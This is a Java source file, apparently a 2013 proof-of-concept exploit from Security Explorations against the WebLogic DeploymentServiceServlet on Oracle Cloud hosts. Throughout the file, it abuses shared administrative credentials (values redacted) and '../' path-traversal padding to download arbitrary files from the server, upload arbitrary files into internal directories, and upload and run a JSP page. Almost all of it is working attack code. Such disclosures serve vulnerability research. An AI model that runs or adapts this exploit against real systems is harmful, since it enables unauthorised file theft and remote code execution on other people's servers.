/*## (c) SECURITY EXPLORATIONS    2013 poland                                #*/
/*##     http://www.security-explorations.com                                #*/

/* weblogic.deploy.service.internal.transport.http.DeploymentServiceServlet   */
/* arbitrary file download / upload / JSP execution                           */

/* THIS SOFTWARE IS PROTECTED BY DOMESTIC AND INTERNATIONAL COPYRIGHT LAWS    */
/* UNAUTHORISED COPYING OF THIS SOFTWARE IN EITHER SOURCE OR BINARY FORM IS   */
/* EXPRESSLY FORBIDDEN. ANY USE, INCLUDING THE REPRODUCTION, MODIFICATION,    */
/* DISTRIBUTION, TRANSMISSION, RE-PUBLICATION, STORAGE OR DISPLAY OF ANY      */
/* PART OF THE SOFTWARE, FOR COMMERCIAL OR ANY OTHER PURPOSES REQUIRES A      */
/* VALID LICENSE FROM THE COPYRIGHT HOLDER.                                   */

/* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS    */
/* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,*/
/* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL    */
/* SECURITY EXPLORATIONS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, */
/* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF  */
/* OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE     */
/* SOFTWARE.                                                                  */

import java.lang.*;
import java.io.*;
import java.net.*;
import java.util.*;
import java.security.*;
import weblogic.deploy.service.internal.transport.DeploymentServiceMessage;
import weblogic.deploy.internal.targetserver.datamanagement.ConfigDataTransferRequestImpl;
import weblogic.common.internal.WLObjectInputStream;
import weblogic.common.internal.WLObjectOutputStream;
import weblogic.deploy.service.internal.DomainVersion;

public class Deploy {

  //shared WebLogic credentials
  static String wls_admin_creds[]={
    "us1","OCLOUD9_WLS_APPID","*INTENTIONALLY_REMOVED*",
    "em1","OCLOUD9_WLS_APPID","*INTENTIONALLY_REMOVED*"
  };

  //shared WebLogic internal application directory
  public static String UPLOAD_DIR = "/domains/wlsaas/servers/m0/tmp/_WL_internal/bea_wls_internal/kdtial/war";

  static String WLS_USER;
  static String WLS_PASS; 

  private static final String MIME_BOUNDARY = "---------------------------5a45123387890";

  private static final String CHDIR_PAD     = "../../../../../../../../../../../../../../";

  static InputStream is;
  static OutputStream os;

  public static void usage() {
    System.out.println("usage: Deploy srv_name id_domain dc_name [-l][-g path][-r jspfile][-u remotepath localfile][-d remotefile localfile]");
    System.exit(0);
  }

  public static void error(String s) {
    System.out.println("error: "+s);
    System.exit(0);
  }

  public static boolean setup_creds(String dcname) {
   for(int  i=0;i<wls_admin_creds.length;i+=3) {
     if (wls_admin_creds[i].equals(dcname)) {
       WLS_USER=wls_admin_creds[i+1];
       WLS_PASS=wls_admin_creds[i+2];
       return true;
     }
   }

   return false;
  }

  public static String get_url(String srv_name,String iddomain,String dcname) {
    return "https://"+srv_name+"-"+iddomain+".java."+dcname+".oraclecloudapps.com/";
  }

  public static HttpURLConnection get_connection(String webaddr) {
    HttpURLConnection res=null;

    try {
      String req_string="/bea_wls_deployment_internal/DeploymentService";

      System.out.println("service URL: "+webaddr);

      URL url=new URL(webaddr+req_string);

      HttpURLConnection conn=(HttpURLConnection)url.openConnection();
      conn.setRequestMethod("POST");

      conn.setRequestProperty("username",URLEncoder.encode(WLS_USER, "UTF-8"));
      conn.setRequestProperty("password",WLS_PASS);

      res=conn;
    } catch (Throwable t) { 
      t.printStackTrace();
    } 

    return res;
  }

  public static void list_deployments(String webaddr) {
    try {
      HttpURLConnection conn=get_connection(webaddr);
      if (conn==null) error("cannot open connection to "+webaddr);

      conn.setRequestProperty("wl_request_type","deployment_svc_msg");
      conn.setRequestProperty("serverName","AdminServer");
      conn.setRequestProperty("deployment_request_id","-1");
      conn.setRequestProperty("isSynchronous","true");

      conn.setRequestProperty("Content-Type", "application/x-java-serialized-object");

      conn.setDoInput(true);
      conn.setDoOutput(true);

      DeploymentServiceMessage msg=new DeploymentServiceMessage();

      msg.messageType=DeploymentServiceMessage.BLOCKING_GET_DEPLOYMENTS;
      msg.fromVersion=new DomainVersion();
      msg.deploymentId=0;
      msg.messageSrc="dummy";
      msg.deploymentType="Application";

      ByteArrayOutputStream bos=new ByteArrayOutputStream();
      WLObjectOutputStream out=new WLObjectOutputStream(bos);
      out.writeObject(msg);
      out.flush();

      byte msg_data[]=bos.toByteArray();

      conn.setRequestProperty("Content-Length", (new StringBuilder()).append("").append(msg_data.length).toString());

      os=conn.getOutputStream();
      os.write(msg_data);
      os.flush();
      os.close();

      int res_code=conn.getResponseCode();
//      if (res_code!=200) error("error ["+res_code+"]");

      is=conn.getInputStream();
      int size=conn.getContentLength();

      byte tab[]=new byte[1];

      while(true) {
       int ch=is.read();
       if (ch==-1) break;
       tab[0]=(byte)ch;

       System.out.print(new String(tab));       
      }
    } catch (Throwable t) { 
      t.printStackTrace();   
    } 
  }

  public static void get_page(String webaddr) {
    try {
      URL url=new URL(webaddr);

      HttpURLConnection conn=(HttpURLConnection)url.openConnection();
      conn.setRequestProperty("username",URLEncoder.encode(WLS_USER, "UTF-8"));
      conn.setRequestProperty("password",URLEncoder.encode(WLS_PASS, "UTF-8"));

      conn.setRequestProperty("Connection","close");

      int res_code=conn.getResponseCode();
      if (res_code!=200) error("error ["+res_code+"]");

      System.out.println("res_code "+res_code);

      is=conn.getInputStream();

      byte tab[]=new byte[1];

      while(true) {
       int ch=is.read();
       if (ch==-1) break;
       tab[0]=(byte)ch;

       System.out.print(new String(tab));       
      }
    } catch (Throwable t) { 
      t.printStackTrace();   
    } 
  }

  public static OutputStream create_file(String filename) {
    FileOutputStream fos=null;

    if (filename.equals("stdout")) return System.out;

    try {
     fos=new FileOutputStream(filename);
    } catch (Throwable t) { 
      t.printStackTrace();   
    } 

    return fos;
  }

  private static String trim_path(String filename) {
    int idx=filename.lastIndexOf('/');

    if (idx>=0) {
      if (idx==(filename.length()-1)) return null;

      filename=filename.substring(idx+1,filename.length());

      if (filename.equals("")) return null;
     }

    return filename;
  }

  private static byte[] get_file_data(String filename) {
    byte res[]=null;
  
    try {
      FileInputStream fis=new FileInputStream(filename);

      filename=trim_path(filename);

      ByteArrayOutputStream baos=new ByteArrayOutputStream();   
      PrintStream out=new PrintStream(baos);

      String s="--"+MIME_BOUNDARY+"\r\n";
      s+="Content-Disposition: form-data; name=\"file\"; filename=\""+URLEncoder.encode(filename,"UTF-8")+"\"\r\n";
      s+="Content-Type: application/x-zip-compressed\r\n";
      s+="\r\n";

      out.print(s);

      DataOutputStream dos=new DataOutputStream(out);
      byte buf[]=new byte[1024];

      while(true) {
       int cnt=fis.read(buf);
       if (cnt==-1) break;

       dos.write(buf,0,cnt);
      }

      out.print("\r\n--"+MIME_BOUNDARY+"--");
      out.flush();
      out.close();
      dos.close();
      fis.close();

      res=baos.toByteArray();
    } catch(Throwable t) {
      t.printStackTrace();
    }

    return res;
  }

  public static void run_jsp(String webaddr,String localfile) {
    try {
     String remotepath=UPLOAD_DIR;

     if (!upload_file(webaddr,remotepath,localfile)) error("cannot upload JSP file");

     String filename=trim_path(localfile);

     String jsp_page=webaddr+"bea_wls_internal/"+filename;

     get_page(jsp_page);     
    } catch(Throwable t) {
      t.printStackTrace();
    }
  }

  public static boolean upload_file(String webaddr,String remotepath,String localfile) {
    boolean res=false;

    if (remotepath.startsWith("/")) {
      remotepath=CHDIR_PAD+remotepath;
    }

    try {
      byte file_data[]=get_file_data(localfile);

      if (file_data==null) {
       error("cannot read file "+localfile);
      }

      HttpURLConnection conn=get_connection(webaddr);
      if (conn==null) error("cannot open connection to "+webaddr);

      conn.setRequestProperty("wl_request_type","app_upload");
      conn.setRequestProperty("wl_upload_application_name",remotepath);

      conn.setRequestProperty("Content-Type", "multipart/form-data; boundary="+MIME_BOUNDARY);
      conn.setRequestProperty("Content-Length", String.valueOf(file_data.length));

      conn.setDoInput(true);
      conn.setDoOutput(true);

      OutputStream os=conn.getOutputStream();
      os.write(file_data);
      os.flush();
      os.close();

      int res_code=conn.getResponseCode();
      if (res_code!=200) error("error ["+res_code+"]");

      BufferedReader reader=new BufferedReader(new InputStreamReader(conn.getInputStream()));
      String server_filename=reader.readLine();
      reader.close();

      System.out.println("uploaded: "+server_filename);
      res=true;
    } catch (Throwable t) { 
      t.printStackTrace();   
    } 

    return res;
  }

  public static void download_file(String webaddr,String remotefile,String localfile) {
    try {
      OutputStream fos=create_file(localfile);

      if (fos==null) {
       error("cannot create file "+localfile);
      }
    
      HttpURLConnection conn=get_connection(webaddr);
      if (conn==null) error("cannot open connection to "+webaddr);

      conn.setRequestProperty("wl_request_type","data_transfer_request");
      conn.setRequestProperty("serverName","AdminServer");
      conn.setRequestProperty("deployment_request_id","-1");

      conn.setRequestProperty("Content-Type", "application/x-java-serialized-object");

      conn.setDoInput(true);
      conn.setDoOutput(true);

      LinkedList paths=new LinkedList();
      paths.add(remotefile);
      String lockpath=null;

      ConfigDataTransferRequestImpl cdtr=new ConfigDataTransferRequestImpl(-1L,paths,lockpath);

      ByteArrayOutputStream bos=new ByteArrayOutputStream();
      WLObjectOutputStream out=new WLObjectOutputStream(bos);
      out.writeObject(cdtr);
      out.flush();

      byte msg_data[]=bos.toByteArray();

      conn.setRequestProperty("Content-Length", (new StringBuilder()).append("").append(msg_data.length).toString());

      os=conn.getOutputStream();
      os.write(msg_data);
      os.flush();
      os.close();

      int res_code=conn.getResponseCode();
      if (res_code!=200) error("error ["+res_code+"]");

      is=conn.getInputStream();

      int size=conn.getContentLength();

      byte buf[]=new byte[1024];

      while(size>0) {
       int cnt=is.read(buf,0,buf.length);
       if (cnt==-1) break;
       fos.write(buf,0,cnt);
       size-=cnt;
      }

      fos.close();

      System.out.println("downloaded: "+localfile);
    } catch (Throwable t) { 
      t.printStackTrace();   
    } 
  }

  public static void main(String[] args) {
    try {
      if (args.length<4) usage();

      String srvname=args[0];       
      String iddomain=args[1];       
      String dcname=args[2];       
      String cmd=args[3];

      if (!setup_creds(dcname)) error("invalid data center name");

      String webaddr=get_url(srvname,iddomain,dcname);

      if (cmd.equals("-g")) {
       if (args.length!=5) usage();

       String path=args[4];
       get_page(webaddr+path);
      } else

      if (cmd.equals("-l")) {
       list_deployments(webaddr);
      } else

      if (cmd.equals("-r")) {
       if (args.length!=5) usage();

       String localfile=args[4];
       run_jsp(webaddr,localfile);
      } else

      if (cmd.equals("-u")) {
       if (args.length!=6) usage();

       String remotepath=args[4];
       String localfile=args[5];

       upload_file(webaddr,remotepath,localfile);
      } else

      if (cmd.equals("-d")) {
       if (args.length!=6) usage();
       String remotefile=args[4];
       String localfile=args[5];

       if (remotefile.startsWith("/")) {
        remotefile=CHDIR_PAD+remotefile;
       }

       download_file(webaddr,remotefile,localfile);
      } else usage();

    } catch (Throwable t) { 
      t.printStackTrace();   
    } 
  }
}
